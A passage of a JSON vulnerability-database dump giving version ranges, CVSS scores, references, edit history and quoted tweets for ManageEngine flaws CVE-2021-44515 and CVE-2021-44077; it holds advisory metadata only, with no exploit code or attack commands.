{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}], "_object_type": "robots.models.cve.CveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.cve.CveBulletin"]}, {"id": "CVE-2021-44077", "vendorId": null, "hash": "7c8c47778ede10e31d3aa064178db529", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "published": "2021-11-29T04:15:00", "modified": "2021-12-28T19:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-28T21:26:09", "history": [{"bulletin": {"id": "CVE-2021-44077", "vendorId": null, "hash": "5f477c5ab880fac2e7fb43488e71bdcd242bdaa0bdcd64d935cc5ad7e54a4c78", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306 is vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "published": "2021-11-29T04:15:00", "modified": "2021-11-29T04:15:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-11-29T08:35:41", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"modified": "2021-11-29T08:35:41", "references": [], "rev": 2}, "score": {"modified": "2021-11-29T08:35:41", "rev": 2, "value": 4.4, "vector": "NONE"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above"}]}, "lastseen": "2021-11-29T08:35:41", "differentElements": ["description", "extraReferences", "modified", "references"], "edition": 1}, {"bulletin": {"id": "CVE-2021-44077", "vendorId": null, "hash": "522e502208806f63ff6c93c1eb7af545732afaddfdfbd3d9d5a83d7108c34ac0", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "published": "2021-11-29T04:15:00", "modified": "2021-11-29T13:42:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-11-30T08:35:52", "history": [], "viewCount": 67, "enchantments": {"dependencies": {"modified": "2021-11-30T08:35:52", "references": [], "rev": 2}, "score": {"modified": "2021-11-30T08:35:52", "rev": 2, "value": 3.9, "vector": "NONE"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "refsource": "MISC", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above"}]}, "lastseen": "2021-11-30T08:35:52", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 2}, {"bulletin": {"id": "CVE-2021-44077", "vendorId": null, "hash": "e614c7278f3ee579b44edceb288226d41f7335cde2dfa507645c66ca6763b488", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "published": "2021-11-29T04:15:00", "modified": "2021-12-01T19:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-02T08:36:04", "history": [], "viewCount": 89, "enchantments": {"dependencies": {"modified": "2021-12-02T08:36:04", "references": [{"idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11"], "type": "threatpost"}, {"idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45", "CISA:72D01121CAFBC56638BC974ABA539CF8"], "type": "cisa"}, {"idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"], "type": "hivepro"}, {"idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"], "type": "thn"}], "rev": 2}, "exploitation": {"modified": "2021-12-02T08:36:04", "wildExploited": true, "wildExploitedSources": [{"idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45"], "type": "cisa"}]}, "score": {"modified": "2021-12-02T08:36:04", "rev": 2, "value": 4.1, "vector": "NONE"}, "twitter": {"counter": 27, "modified": "2021-12-02T08:36:04", "tweets": [{"link": "https://twitter.com/cybermaterial_/status/1468046419055591424", "text": "NEW POST CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus - /hashtag/cybersecurity?src=hashtag_click /hashtag/ransomware?src=hashtag_click /hashtag/malware?src=hashtag_click /hashtag/infosec?src=hashtag_click https://t.co/v2ESdGE8IQ"}, {"link": "https://twitter.com/buaqbot/status/1468444170973069313", "text": "CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus Pre-Auth RCE\n https://t.co/8UeCDZ8N56\nhttps://t.co/YcwW9Mihyb"}, {"link": "https://twitter.com/the_yellow_fall/status/1467691739930578949", "text": "CVE-2021-44077: Zoho ManageEngine ServiceDesk Plus Authentication Bypass Vulnerability https://t.co/VMpFZYNCph /hashtag/opensource?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/security?src=hashtag_click /hashtag/pentest?src=hashtag_click"}, {"link": "https://twitter.com/moton/status/1467484159753199624", "text": "CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus - https://t.co/bnNbM3M0kl"}, {"link": "https://twitter.com/Har_sia/status/1467509073969291269", "text": "CVE-2021-44077 https://t.co/biolHoHDKv /hashtag/HarsiaInfo?src=hashtag_click"}, {"link": "https://twitter.com/helpnetsecurity/status/1467463980637696007", "text": "Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability (CVE-2021-44077) - https://t.co/iqNo9dPVsA - /CISAgov /Unit42_Intel /manageengine /hashtag/exploitation?src=hashtag_click /hashtag/ManageEngine?src=hashtag_click /hashtag/APT?src=hashtag_click /hashtag/enterprise?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/webshell?src=hashtag_click /hashtag/reconnaissance?src=hashtag_click"}, {"link": "https://twitter.com/DrewSanford/status/1467611492233134084", "text": "Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability (CVE-2021-44077) - Help Net Security"}, {"link": "https://twitter.com/hernanespinoza/status/1468140357674229772", "text": " Have you reviewed /CISAgov and /FBI\u2019s latest released on active /hashtag/APT?src=hashtag_click exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus? Review https://t.co/wQZUywIOEB and immediately patch your /hashtag/software?src=hashtag_click to prevent exploitation. \n/hashtag/Cybersecurity?src=hashtag_click /hashtag/In?src=hashtag_click\u2026"}, {"link": "https://twitter.com/CyberSecDN/status/1467442698822946816", "text": "Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability (CVE-2021-44077) https://t.co/ZCmTGRi95A /hashtag/IT_securitynews?src=hashtag_click"}, {"link": "https://twitter.com/drwareinc/status/1467546845756932103", "text": "APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk\u00a0Plus"}]}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_supportcenter_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus_msp:10.5", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "le", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "le", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "le", "version": "11.3"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": 